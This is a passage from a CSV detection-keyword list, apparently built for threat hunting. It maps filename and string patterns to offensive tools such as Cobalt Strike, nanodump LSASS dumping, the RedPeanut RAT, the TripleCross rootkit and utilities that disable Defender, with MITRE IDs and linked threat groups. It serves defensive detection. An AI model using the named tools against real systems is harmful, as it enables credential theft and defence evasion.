"*source/flash_exploiter*",".{0,1000}source\/flash_exploiter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59893"
"*source/javapayload*",".{0,1000}source\/javapayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59894"
"*source/psh_exe*",".{0,1000}source\/psh_exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59895"
"*source/shtinkering.*",".{0,1000}source\/shtinkering\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","59896"
"*Source\wdextract\*",".{0,1000}Source\\wdextract\\.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59897"
"*Source\wdextract\zlib\dll_x64\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59898"
"*Source\wdextract\zlib\dll_x86\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x86\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59899"
"*Source\wdextract\zlib\lib\zlibwapi32.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi32\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59900"
"*Source\wdextract\zlib\lib\zlibwapi64.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi64\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","59901"
"*SourcePoint*Loader.go*",".{0,1000}SourcePoint.{0,1000}Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","59903"
"*source-teamserver.sh*",".{0,1000}source\-teamserver\.sh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59904"
"*spacerunner.exe -i *.ps1* -o *.exe*",".{0,1000}spacerunner\.exe\s\-i\s.{0,1000}\.ps1.{0,1000}\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","59905"
"*SpaceRunner-master.zip*",".{0,1000}SpaceRunner\-master\.zip.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","59906"
"*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#email #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","59907"
"*SpamChannel-main.zip*",".{0,1000}SpamChannel\-main\.zip.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","59908"
"*Spartacus.exe --mode proxy*",".{0,1000}Spartacus\.exe\s\-\-mode\sproxy.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59909"
"*Spartacus-main.zip*",".{0,1000}Spartacus\-main\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59910"
"*spartacus-proxy-*.log*",".{0,1000}spartacus\-proxy\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59911"
"*Spartacus-v2.*-x64.zip*",".{0,1000}Spartacus\-v2\..{0,1000}\-x64\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","59912"
"*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","59913"
"*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","59914"
"*Spawn a phantom shell - with pattern-based trigger*",".{0,1000}Spawn\sa\sphantom\sshell\s\-\swith\spattern\-based\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59915"
"*Spawn CoercedPotato as a Reflective DLL*",".{0,1000}Spawn\sCoercedPotato\sas\sa\sReflective\sDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","59916"
"*Spawn encrypted pseudo-shell with IP - with *",".{0,1000}Spawn\sencrypted\spseudo\-shell\swith\sIP\s\-\swith\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59917"
"*Spawn plaintext pseudo-shell with IP - using *",".{0,1000}Spawn\splaintext\spseudo\-shell\swith\sIP\s\-\susing\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","59918"
"*spawn/runshellcode*",".{0,1000}spawn\/runshellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","59919"
"*spawn_cmd.dll*",".{0,1000}spawn_cmd\.dll.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","59920"
"*spawnas * \ HACKER https*",".{0,1000}spawnas\s.{0,1000}\s\\\sHACKER\shttps.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59921"
"*SpawnAsAgentManager.cs*",".{0,1000}SpawnAsAgentManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59922"
"*spawnasshellcode*",".{0,1000}spawnasshellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59923"
"*SpawnAsShellcodeManager*",".{0,1000}SpawnAsShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59924"
"*SpawneRv6yTYhShell*",".{0,1000}SpawneRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","59925"
"*Spawning registry with TrustedInstaller privileges to delete WdFilter *",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sdelete\sWdFilter\s.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59926"
"*Spawning registry with TrustedInstaller privileges to Disable 'DisableIOAVProtection' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sDisable\s\'DisableIOAVProtection\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59927"
"*Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sDisable\s\'RealtimeMonitoring\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59928"
"*Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey*",".{0,1000}Spawning\sregistry\swith\sTrustedInstaller\sprivileges\sto\sEnable\s\'TamperProtection\'\sregkey.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","59929"
"*SpawnPPIDAgentManager*",".{0,1000}SpawnPPIDAgentManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59930"
"*SpawnShellcode.cs*",".{0,1000}SpawnShellcode\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59931"
"*SpawnShellcodeManager*",".{0,1000}SpawnShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59932"
"*spawnT2W(*",".{0,1000}spawnT2W\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#content","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","59933"
"*SpawnTheThing(*",".{0,1000}SpawnTheThing\(.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","59934"
"*spawnto *.exe",".{0,1000}spawnto\s.{0,1000}\.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 